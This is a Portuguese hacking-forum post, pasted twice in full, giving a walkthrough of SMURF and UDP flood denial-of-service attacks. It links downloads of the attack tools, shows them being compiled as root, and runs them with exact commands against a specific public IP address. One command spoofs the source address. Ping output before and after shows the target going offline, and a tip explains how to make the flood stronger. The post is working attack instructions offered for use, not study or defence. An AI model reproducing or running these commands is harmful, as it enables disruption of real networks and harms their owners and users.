Realizando ataque SMURF e UDP Flood
Página 1 de 1
Realizando ataque SMURF e UDP Flood
ai galera quem fala aqui e veronmaiden conhecido com cavalhero do sistem, com mais um totorial falando sobre ataque de SMURF e UDP Flood
espero que goste qual que duvida escreva no form
Tutorial – Realizando ataque SMURF e UDP Flood
|=====================================|
| Introdução |
|=====================================|
Oi, eu sou Dreamexplo e estou fazendo este tutorial para demonstrar como realizar um ataque SMURF e UDP Flood.
|=====================================|
| Materiais |
|=====================================|
Para prosseguirmos precisamos de 3 coisas:
—> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de Ips
Link: http://www.4shared.com/file/118011308/b … dcast.html
)
—> smurf.c (
Link: http://www.4shared.com/file/118010956/9 … smurf.html
)
—> udp_flooder.c (
Link: http://www.4shared.com/file/118010966/b … ooder.html
)
|=====================================|
| Primeiros passos |
|=====================================|
Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#
Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#
|=====================================|
| Preparando o ataque com Smurf |
|=====================================|
Para continuar daqui pra frente você precisa se tornar root no konsole.
Executando o smurf:
# ./smurf
usage: ./smurf <target> <bcast file> <num packets> <packet delay> <packet size>
target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102)
O comando que irei utilizar para atacar sera este abaixo:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024
|=====================================|
| Atacando o alvo |
|=====================================|
Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms
^C
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5006ms
Esta “ON”, agora vou executar o comando para atacar:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024
smurf.c v4.0 by TFreak
Flooding 200.140.161.201 (. = 25 outgoing packets)
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms
— 200.140.161.201 ping statistics —
28 packets transmitted, 5 received, 82% packet loss, time 27086ms
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
— 200.140.161.201 ping statistics —
5 packets transmitted, 0 received, 100% packet loss, time 3999ms
Pronto, o alvo esta “OFF”.
(DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque.
Agora vamos utilizar o udp_flooder.
Para executa-lo:
# ./udp_flooder
[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]
Uso: ./udp_flooder <IP_Spoof> <Vitima> <Port_origem> <Port_Destino> <msg> <num_msgs>
O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000
(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)
Vamos “pingar” o host alvo:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5008ms
Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000
— Estatisticas e infos do ataque ————-
Total de bytes enviados: [31000000]
—————————————-
Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
— 200.140.161.201 ping statistics —
15 packets transmitted, 0 received, 100% packet loss, time 14112ms
Como podem ver o alvo ficou “OFF”.
Espero que tenham gostado.
espero que goste qual que duvida escreva no form
Tutorial – Realizando ataque SMURF e UDP Flood
|=====================================|
| Introdução |
|=====================================|
Oi, eu sou Dreamexplo e estou fazendo este tutorial para demonstrar como realizar um ataque SMURF e UDP Flood.
|=====================================|
| Materiais |
|=====================================|
Para prosseguirmos precisamos de 3 coisas:
—> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de Ips
Link: http://www.4shared.com/file/118011308/b … dcast.html
)
—> smurf.c (
Link: http://www.4shared.com/file/118010956/9 … smurf.html
)
—> udp_flooder.c (
Link: http://www.4shared.com/file/118010966/b … ooder.html
)
|=====================================|
| Primeiros passos |
|=====================================|
Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#
Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#
|=====================================|
| Preparando o ataque com Smurf |
|=====================================|
Para continuar daqui pra frente você precisa se tornar root no konsole.
Executando o smurf:
# ./smurf
usage: ./smurf <target> <bcast file> <num packets> <packet delay> <packet size>
target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102)
O comando que irei utilizar para atacar sera este abaixo:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024
|=====================================|
| Atacando o alvo |
|=====================================|
Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms
^C
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5006ms
Esta “ON”, agora vou executar o comando para atacar:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024
smurf.c v4.0 by TFreak
Flooding 200.140.161.201 (. = 25 outgoing packets)
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms
— 200.140.161.201 ping statistics —
28 packets transmitted, 5 received, 82% packet loss, time 27086ms
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
— 200.140.161.201 ping statistics —
5 packets transmitted, 0 received, 100% packet loss, time 3999ms
Pronto, o alvo esta “OFF”.
(DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque.
Agora vamos utilizar o udp_flooder.
Para executa-lo:
# ./udp_flooder
[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]
Uso: ./udp_flooder <IP_Spoof> <Vitima> <Port_origem> <Port_Destino> <msg> <num_msgs>
O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000
(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)
Vamos “pingar” o host alvo:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5008ms
Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000
— Estatisticas e infos do ataque ————-
Total de bytes enviados: [31000000]
—————————————-
Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:
# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
— 200.140.161.201 ping statistics —
15 packets transmitted, 0 received, 100% packet loss, time 14112ms
Como podem ver o alvo ficou “OFF”.
Espero que tenham gostado.
Tópicos semelhantes
» Simulação de ataque hacker do Governo dos EUA
» Facebook Hacking Usando Man in the Middle Ataque
» Hacker: 80% dos brasileiros já sofreram ataque na rede, prejuízos chegam a US$ 63,3 bi por ano
» Facebook Hacking Usando Man in the Middle Ataque
» Hacker: 80% dos brasileiros já sofreram ataque na rede, prejuízos chegam a US$ 63,3 bi por ano
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos